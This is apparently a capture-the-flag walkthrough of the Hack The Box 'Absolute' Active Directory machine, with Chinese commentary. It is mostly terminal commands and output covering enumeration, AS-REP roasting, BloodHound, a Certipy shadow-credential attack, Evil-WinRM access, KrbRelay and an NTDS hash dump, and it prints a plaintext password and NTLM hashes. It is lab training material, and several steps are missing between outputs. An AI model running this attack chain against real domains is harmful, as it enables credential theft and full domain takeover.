root@fdvoid0# nmap -p- --min-rate 10000 10.10.11.181 Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-21 06:36 EDT Nmap scan report for 10.10.11.181 Host is up (0.087s latency). Not shown: 65509 closed ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49675/tcp open unknown 49686/tcp open unknown 49692/tcp open unknown 49699/tcp open unknown 49703/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
root@fdvoid0# nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.11.181 Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-21 06:37 EDT Nmap scan report for 10.10.11.181 Host is up (0.088s latency).
PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Absolute 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-21 17:38:06Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 |_ssl-date: 2023-05-21T17:40:40+00:00; +6h59m59s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 |_ssl-date: 2023-05-21T17:40:39+00:00; +7h00m00s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 |_ssl-date: 2023-05-21T17:40:40+00:00; +6h59m59s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 |_ssl-date: 2023-05-21T17:40:39+00:00; +7h00m00s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/21%Time=6469F493%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.96 seconds
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# ldapsearch -H ldap://dc.absolute.htb -x -b "DC=absolute,DC=htb" # extended LDIF # # LDAPv3 # base <DC=absolute,DC=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL #
# search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563
Host's addresses: __________________ absolute.htb. 600 IN A 10.10.11.181 Name Servers: ______________ dc.absolute.htb. 1200 IN A 10.10.11.181 Mail (MX) Servers: ___________________ Trying Zone Transfers and getting Bind Versions: _________________________________________________ unresolvable name: dc.absolute.htb at /usr/bin/dnsenum line 900. Trying Zone Transfer for absolute.htb on dc.absolute.htb ... AXFR record query failed: no nameservers Brute forcing with /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt: ______________________________________________________________________________________ dc.absolute.htb. 1200 IN A 10.10.11.181 gc._msdcs.absolute.htb. 600 IN A 10.10.11.181 domaindnszones.absolute.htb. 600 IN A 10.10.11.181 forestdnszones.absolute.htb. 600 IN A 10.10.11.181 absolute.htb class C netranges: ________________________________ Performing reverse lookup on 0 ip addresses: _____________________________________________ 0 results out of 0 IP addresses. absolute.htb ip blocks: ________________________ done.
然而这些都没什么用。
Website - TCP 80
该网站是一个专注于设计和图像的简单页面:
图像每隔几秒旋转一次。唯一的链接指向模板。
技术栈
HTTP响应头只表示IIS,没有其他内容:
1 2 3 4 5 6 7 8 9
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Tue, 07 Jun 2022 19:29:10 GMT Accept-Ranges: bytes ETag: "0877fdca47ad81:0" Server: Microsoft-IIS/10.0 Date: Sun, 21 May 2023 23:50:51 GMT Connection: close Content-Length: 2909
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# exiftool hero_1.jpg ExifTool Version Number : 12.57 File Name : hero_1.jpg Directory : . File Size : 407 kB File Modification Date/Time : 2022:06:07 15:45:20-04:00 File Access Date/Time : 2023:05:29 02:44:24-04:00 File Inode Change Date/Time : 2023:05:29 02:44:24-04:00 File Permissions : -rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg Exif Byte Order : Little-endian (Intel, II) X Resolution : 72 Y Resolution : 72 Resolution Unit : inches Artist : James Roberts Y Cb Cr Positioning : Centered Quality : 60% XMP Toolkit : Image::ExifTool 11.88 Author : James Roberts Creator Tool : Adobe Photoshop CC 2018 Macintosh Derived From Document ID : 6413FD608B5C21D0939F910C0EFBBE44 Derived From Instance ID : 6413FD608B5C21D0939F910C0EFBBE44 Document ID : xmp.did:887A47FA048811EA8574B646AF4FC464 Instance ID : xmp.iid:887A47F9048811EA8574B646AF4FC464 DCT Encode Version : 100 APP14 Flags 0 : [14], Encoded with Blend=1 downsampling APP14 Flags 1 : (none) Color Transform : YCbCr Image Width : 1900 Image Height : 1150 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 1900x1150 Megapixels : 2.2
James Roberts是“Author” 和 “Artist”。其他的没有“Artist”,但他们都有一个“Author”字段。
Generate Users List
有了users列表,就可以测试Kerberos,看看是否有有效的用户名。得到一个users列表:
1 2 3 4 5 6 7 8
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# for i in $(seq 1 6); do exiftool hero_${i}.jpg | grep Author | awk '{print $3 " " $4}'; done | tee users James Roberts Michael Chaffrey Donald Klay Sarah Osvald Jeffer Robinson Nicole Smith
[-] User j.roberts@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User m.chaffrey@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User s.osvald@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User j.robinson@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$d.klay@absolute.htb@ABSOLUTE.HTB:7babac3563f9d82cdd68fc5f6a8c35bf$6f67d29d9f1811e4fe60990d208c59ecf1850e55cc44ac5d2d31e8db12d663b514a2ab8f186fb70475960feffa9244139f153276a20dcbe4aa8d39739f419e6d19c13d4304c167c3854afa3da678b0594aa746b8f42ad39ef55c20aa501f817ba52722ab2c75b5eaeddf5ef8008bd3e61b2d19b672b7bb1db571b5c8d6cfe3ae357c731fa8c9bea2dad013b5b3439b2b0c4cbaff742d08dcfc1f7217f4c1818face9910b051b19567bdf0a0d68d715750d7cbad67c2c56064d1b8e5c3bdf7604fa408f76fc72012061bd2de8be211d57dddb04f93bf4122cb8d8a3d82be8c18e472184e798ae2477d70dea34 [-] User n.smith@absolute.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# bloodhound-python -u d.klay -p 'Darkmoonsky248girl' -k -d absolute.htb -dc dc.absolute.htb -ns 10.10.11.181 -c ALL --zip 1 ⨯ INFO: Found AD domain: absolute.htb INFO: Using TGT from cache INFO: Found TGT with correct principal in ccache file. INFO: Connecting to LDAP server: dc.absolute.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.absolute.htb INFO: Found 18 users INFO: Found 55 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.absolute.htb INFO: Done in 01M 56S INFO: Compressing output into 20230529130934_bloodhound.zip
将zip文件上传到Bloodhound, 然后找到d.klay, 标记为已拿下:
不幸的是,这个用户没有本地管理权限,没有执行权限,也没有出站对象控制权限:
SMB
有了creds,可以看看SMB shares:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# crackmapexec smb dc.absolute.htb -k -u d.klay -p 'Darkmoonsky248girl' --shares SMB dc.absolute.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False) SMB dc.absolute.htb 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl SMB dc.absolute.htb 445 DC [+] Enumerated shares SMB dc.absolute.htb 445 DC Share Permissions Remark SMB dc.absolute.htb 445 DC ----- ----------- ------ SMB dc.absolute.htb 445 DC ADMIN$ Remote Admin SMB dc.absolute.htb 445 DC C$ Default share SMB dc.absolute.htb 445 DC IPC$ READ Remote IPC SMB dc.absolute.htb 445 DC NETLOGON READ Logon server share SMB dc.absolute.htb 445 DC Shared SMB dc.absolute.htb 445 DC SYSVOL READ Logon server share
[-] CCache file is not found. Skipping... Type helpfor list of commands # shares ADMIN$ C$ IPC$ NETLOGON Shared SYSVOL # use SYSVOL # ls drw-rw-rw- 0 Thu Jun 9 04:16:22 2022 . drw-rw-rw- 0 Thu Jun 9 04:16:22 2022 .. drw-rw-rw- 0 Thu Jun 9 04:16:22 2022 absolute.htb
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# crackmapexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users 130 ⨯ SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.181 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl LDAP 10.10.11.181 389 DC [*] Total of records returned 20 LDAP 10.10.11.181 389 DC Administrator Built-in account for administering the computer/domain LDAP 10.10.11.181 389 DC Guest Built-in account for guest access to the computer/domain LDAP 10.10.11.181 389 DC krbtgt Key Distribution Center Service Account LDAP 10.10.11.181 389 DC J.Roberts LDAP 10.10.11.181 389 DC M.Chaffrey LDAP 10.10.11.181 389 DC D.Klay LDAP 10.10.11.181 389 DC s.osvald LDAP 10.10.11.181 389 DC j.robinson LDAP 10.10.11.181 389 DC n.smith LDAP 10.10.11.181 389 DC m.lovegod LDAP 10.10.11.181 389 DC l.moore LDAP 10.10.11.181 389 DC c.colt LDAP 10.10.11.181 389 DC s.johnson LDAP 10.10.11.181 389 DC d.lemm LDAP 10.10.11.181 389 DC svc_smb AbsoluteSMBService123! LDAP 10.10.11.181 389 DC svc_audit LDAP 10.10.11.181 389 DC winrm_user Used to perform simple network tasks
要将用户添加到NETWORK AUDIT组中,可以首先将用户m.lovegod设置为组的所有者。为了修改一个组的所有者,可以使用[owneredit.py] New example script to change an object’s owner #1323,这是Impacket套件的一个拉取请求里的脚本。
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# kinit m.lovegod Password for m.lovegod@ABSOLUTE.HTB:
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# net rpc group addmem "Network Audit" m.lovegod -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb Password for [WORKGROUP\m.lovegod]:
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb Password for [WORKGROUP\m.lovegod]: absolute\m.lovegod absolute\svc_audit
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# net rpc group addmem "Network Audit" m.lovegod -U 'm.lovegod' -k -S dc.absolute.htb WARNING: The option -k|--kerberos is deprecated!
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# net rpc group members "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb WARNING: The option -k|--kerberos is deprecated! absolute\m.lovegod absolute\svc_audit
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# certipy find -username m.lovegod@absolute.htb -k -target dc.absolute.htb Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for'absolute-DC-CA' via CSRA [!] Got error while trying to get CA configuration for'absolute-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for'absolute-DC-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for'absolute-DC-CA' [*] Saved BloodHound data to '20230530133316_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20230530133316_Certipy.txt' [*] Saved JSON output to '20230530133316_Certipy.json'
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# certipy shadow auto -k -no-pass -u absolute.htb/m.lovegod@dc.absolute.htb -dc-ip 10.10.11.181 -target dc.absolute.htb -account winrm_user Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_user' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '56abaff7-ff87-070d-beac-48aa003f33a9' [*] Adding Key Credential with device ID '56abaff7-ff87-070d-beac-48aa003f33a9' to the Key Credentials for'winrm_user' [*] Successfully added Key Credential with device ID '56abaff7-ff87-070d-beac-48aa003f33a9' to the Key Credentials for'winrm_user' [*] Authenticating as 'winrm_user' with the certificate [*] Using principal: winrm_user@absolute.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'winrm_user.ccache' [*] Trying to retrieve NT hashfor'winrm_user' [*] Restoring the old Key Credentials for'winrm_user' [*] Successfully restored the old Key Credentials for'winrm_user' [*] NT hashfor'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby3.0: no such file or directory
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
[*] Relaying context: absolute.htb\DC$ [*] Rewriting function table [*] Rewriting PEB [*] GetModuleFileName: System [*] Init com server [*] GetModuleFileName: C:\programdata\KrbRelay1.exe [*] Register com server objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAB9vU64ftMuuYvY9fnAPSf9AogAABwX//+5tG+e1GpphiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Relaying context: absolute.htb\DC$ [*] Rewriting function table [*] Rewriting PEB [*] GetModuleFileName: System [*] Init com server [*] GetModuleFileName: C:\programdata\KrbRelay1.exe [*] Register com server objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABXmOFkCjduDHUSM3VtL2fUAoQAAOwU//9NMvzhG3NliiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP/
*Evil-WinRM* PS C:\Users\winrm_user\Documents> net user winrm_user User name winrm_user Full Name Comment Used to perform simple network tasks User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/9/2022 1:25:51 AM Password expires Never Password changeable 6/10/2022 1:25:51 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 6/9/2022 7:13:12 AM Logon hours allowed All Local Group Memberships *Administrators *Remote Management Use Global Group memberships *Domain Users *Protected Users The command completed successfully. *Evil-WinRM* PS C:\Users\winrm_user\Documents> cat C:\Users\Administrator\Desktop\root.txt e9cefad9242174ae18798c39f2c275d5
*Evil-WinRM* PS C:\programdata> net user winrm_user User name winrm_user Full Name Comment Used to perform simple network tasks User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/9/2022 1:25:51 AM Password expires Never Password changeable 6/10/2022 1:25:51 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 5/31/2023 8:44:50 AM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Users *Protected Users The command completed successfully.
┌──(root💀kali)-[~/hackthebox/machine/absolute] └─# crackmapexec smb -dc-ip dc.absolute.htb -u 'DC$' -H A7864AB463177ACB9AEC553F18F42577 --ntds SMB dc.absolute.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:c-ip) (signing:True) (SMBv1:False) SMB dc.absolute.htb 445 DC [+] c-ip\DC$:A7864AB463177ACB9AEC553F18F42577 SMB dc.absolute.htb 445 DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied SMB dc.absolute.htb 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB dc.absolute.htb 445 DC Administrator\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1f4a6093623653f6488d5aa24c75f2ea::: SMB dc.absolute.htb 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB dc.absolute.htb 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ca378b063b18294fa5122c66c2280d4::: SMB dc.absolute.htb 445 DC J.Roberts:1103:aad3b435b51404eeaad3b435b51404ee:7d6b7511772593b6d0a3d2de4630025a::: SMB dc.absolute.htb 445 DC M.Chaffrey:1104:aad3b435b51404eeaad3b435b51404ee:13a699bfad06afb35fa0856f69632184::: SMB dc.absolute.htb 445 DC D.Klay:1105:aad3b435b51404eeaad3b435b51404ee:21c95f594a80bf53afc78114f98fd3ab::: SMB dc.absolute.htb 445 DC s.osvald:1106:aad3b435b51404eeaad3b435b51404ee:ab14438de333bf5a5283004f660879ee::: SMB dc.absolute.htb 445 DC j.robinson:1107:aad3b435b51404eeaad3b435b51404ee:0c8cb4f338183e9e67bbc98231a8e59f::: SMB dc.absolute.htb 445 DC n.smith:1108:aad3b435b51404eeaad3b435b51404ee:ef424db18e1ae6ba889fb12e8277797d::: SMB dc.absolute.htb 445 DC m.lovegod:1109:aad3b435b51404eeaad3b435b51404ee:a22f2835442b3c4cbf5f24855d5e5c3d::: SMB dc.absolute.htb 445 DC l.moore:1110:aad3b435b51404eeaad3b435b51404ee:0d4c6dccbfacbff5f8b4b31f57c528ba::: SMB dc.absolute.htb 445 DC c.colt:1111:aad3b435b51404eeaad3b435b51404ee:fcad808a20e73e68ea6f55b268b48fe4::: SMB dc.absolute.htb 445 DC s.johnson:1112:aad3b435b51404eeaad3b435b51404ee:b922d77d7412d1d616db10b5017f395c::: SMB dc.absolute.htb 445 DC d.lemm:1113:aad3b435b51404eeaad3b435b51404ee:e16f7ab64d81a4f6fe47ca7c21d1ea40::: SMB dc.absolute.htb 445 DC svc_smb:1114:aad3b435b51404eeaad3b435b51404ee:c31e33babe4acee96481ff56c2449167::: SMB dc.absolute.htb 445 DC svc_audit:1115:aad3b435b51404eeaad3b435b51404ee:846196aab3f1323cbcc1d8c57f79a103::: SMB dc.absolute.htb 445 DC winrm_user:1116:aad3b435b51404eeaad3b435b51404ee:8738c7413a5da3bc1d083efc0ab06cb2::: SMB dc.absolute.htb 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:a7864ab463177acb9aec553f18f42577::: SMB dc.absolute.htb 445 DC [+] Dumped 18 NTDS hashes to /root/.cme/logs/DC_dc.absolute.htb_2023-05-31_120153.ntds of which 17 were added to the database
*Evil-WinRM* PS C:\Users\winrm_user\Documents> net user administrator User name Administrator Full Name Comment Built-in account for administering the computer/domain User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/9/2022 1:25:57 AM Password expires Never Password changeable 6/10/2022 1:25:57 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 5/31/2023 9:05:00 AM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *Domain Users *Schema Admins *Enterprise Admins *Domain Admins *Group Policy Creator The command completed successfully.